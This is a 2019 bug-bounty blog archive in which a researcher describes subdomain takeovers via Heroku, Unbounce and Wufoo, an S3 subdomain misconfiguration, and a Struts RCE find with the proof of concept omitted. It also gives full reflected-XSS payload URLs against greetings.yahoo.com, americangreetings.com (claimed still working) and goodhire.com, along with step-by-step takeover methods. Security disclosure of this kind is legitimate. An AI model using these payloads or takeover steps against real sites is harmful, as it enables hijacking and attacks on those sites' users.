Apr 13, 2019

[ Special Case ] HerkoKuDns is Still vulnerable to Subdomain Takeovers ( Live PoC )




Today I will Share a New Found about 
Subdomain Takeovers
Via HeroKuDNS 
[ Edge Case ]

Many Blogs says You can't takeover from herokudns any more 
because now they use a Random cname generator 

In this blog I will explain How could I takeover this Domain 
And Adding it to my Custom Domains List on my heroku dashboard
-----------------------------------------------
Explain 
Simply 
1) if you see the this pic 
which Show you in Title " No Such App "


2) Now Go to see DNS of the Subdomain 
if you found it like this ( IPS) 

3) You can Add it Directly to your Heroku Account to any App as a Custom domain 
Yes When You add it you will get a Random Cname Like what happen when I added dns-scratch.me to my account 



4)  Domain or Subdomain is now Connected 



---------------------------------------------------------

Apr 12, 2019

[RCE] Remote code execution at api.PrivateProgram.com (CVE-2017-5638)





Apache Struts CVE-2017-5638 
Remote Code Execution Vulnerability
Program : Private on HackerOne
Bounty : 2000$ and 250$ Bouns
Subdomain : Api.Private.com


Today I will Post my new Find 
Remote code execution
in Api Subdomain of Private Program 
which was used a Vulnerable version of Apache Struts
(CVE-2017-5638)

CVE-2017-5638 Describe : 
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Poc was : 


References : 





----------------------------------------------------------

Mar 19, 2019

Feb 26, 2019

[Still work] Redirect Yahoo Subdomain XSS Reflected from americangreetings.com






Bug Type : Reflected XSS
Affected Site : americangreetings.com 
Yahoo Subdomain : greetings.yahoo.com


Description 
I've reported this to yahoo and Greeting but was marked as infromative 
so they don't mind to disclose it.

This XSS  still work 

I've found that yahoo subdomain greetings.yahoo.com can be redirect to any path americangreetings.com 

So I tried to get a reflected XSS at americangreetings.com in paths

The XSS was affected this path 
/search-results/{xss payload}

************************************
Suggested fix to yahoo was
to make fix like 
greetings.yahoo.ca
it redirect only to site home only 

***************************************

Poc link : 

http://greetings.yahoo.com/search-results/'"--><Details Open OnToggle=confirm`Haron`>

https://www.americangreetings.com/search-results/'%22--%3e%3cDetails%20Open%20OnToggle=confirm%60Haron%60%3e


*************************************


Feb 22, 2019

AWS s3 Buckets Create





Amazon aws s3 buckets are Simple and Can be created by everyone

************************
Steps to create a S3 bucket 

1) you must create an amazon aws account first ( Required Credit Card ) 
 your payment information so we can verify your identity. They will not charge you unless your usage exceeds the AWS Free Tier Limits.


3) create Bucket is simple here as you see in pic 

2) Enter you Bucket name 
I've choose HaronBucket 
Please remember this will be your bucket link 
exmaple as mine 
haronbucket.s3.amazonaws.com
s3.amazonaws.com/haronbucket


Click Next Then Next if you don't need a special config or permissions



After clicking Create Bucket
Your Bucket will be Shown in Buckets Home


**********************************
Now Upload your files is very easy 
1) go to your buckets home
2) choose your bucket which you want to upload files 
or you can go to this link ( add your bucket )
https://s3.console.aws.amazon.com/s3/buckets/your-bucket/


3) Click on get Start and Choose your files you want to upload :) then click upload

4 ) Your upload file will be shown in your bucket home files click on the file which you upload




5) click on Make Public and scroll down you will see your file link Public


Subdomain Misconfiguration lead to AWS S3 Buckets Reader




Bug Type : Subdomain misconfiguration
Program : Private on HackerOne
Severity : P2 ( High
Bounty : 600$ + 200$ Bouns
Subdomain : images.example.com

************************************
How I found this Bug 
it was simple When I go direct to https://images.example.com I found it redirect to https://aws.amazon.com/s3/

So now I started to found the cname and it was
images.example.com  >  s3.amazon.com

Here was the bug I saw many companies use the same error 
Developers must add a white s3 Buckets list 

So now I can call any bucket on images.example.com

example : images.example.com/haron-bucket/




************************
Steps to find This error very simple
 if the subdomain has this alias s3.amazonaws.com 
Try to add your bucket directly to subdomain 
example : subdomain.site.com/yourbucket/yourfile.html
if it run this is vulnerable if not so this mean developers added a white buckets list

******************************************


Please see this Write Up for create your Bucket 
https://www.mohamedharon.com/2019/02/aws-s3-buckets-create.html




*********************************************************


Feb 18, 2019

2 Subdomains Takeover via Unbounce in a Private Program









Many Researchers asked me about this takeover is still exist or fixed ? 
Yes this takeover still exist with 3 scenarios 
as Akita Zen said 


*****************************
Bug Type : Subdomain Takeover 
Service : Unbounce 
Severity : Critical 
Program : Private on Hackerone
Status : Duplicate after fixing it

*************************
In a Private Program on HackerOne I've found a 2 subdomains
get.example.com
try.example.com
 has an cname  pointing to unbouncepages.com
and show me the takeover error ( Finger print ) 
So I made an account and tried to add the domain to my page on unbounce and it connected Successful 


Steps to takeover 
1) create an account on unbounce with credit card  
2) create your unbounce page 
3) add a domain to your page 
if give you the domain is already taken this mean there is no takeover.
example : info.hacker.one
its show us the takeover finger print but its already worked and added to another account so there is no takeover in it.




Timeline 
Reported : 6 Nov,2018
Traiged : 7 Nov,2018
I notice that they Fixed it : 7 Nov,2018 after 2 hours 
Duplicate : 10 Nov,2018


******************************

Feb 17, 2019

Reflected XSS in GoodHire.com CMS

Reflected XSS in GoodHire.com CMS






Program : inflection
Bug Type : Reflected XSS
Severity : High 
Domain : GoodHire.com
Bounty : 0$ + Bouns 150$

******************************
Affected Parameter was in HubSpot CMS
referrerUrl
Affected Path 
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
Poc was : 
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


***********************************
More about this Bug please visit my write up 






****************************************

Feb 16, 2019

Subdomain Takeover via Wufoo Service in a Private Program







Program : Private Program On Hackerone
Bug Type : Subdomain Takeover
Service : WUFOO
Severity :  Medium (cause it redirect)
Reward : 500$
Subdomain : Bug.example.com

*********************************
Wufoo 
Wufoo's HTML form builder helps you create online web forms. Use our web form creator to power your contact forms, online surveys, and event registrations.

*************************************
Steps and how I found this Bug 

When I go directly to the Subdomain 
It redirect me to another subdomain and Show me this error


First I notice that Profile Not found 
So I searched About Wufoo and See what it do

1) When you create a free profile on Wufoo 
they give you a Subdomain for your profile

yourprofile.wufoo.com

2) You can change it later so I changed it to subdomian cname which was not found

3) Created a Form to provide more Poc 


4 ) Seems this Poc is enough if you wanna add a page or JavaScript Codes
 you will upgrade your free account 




**********************************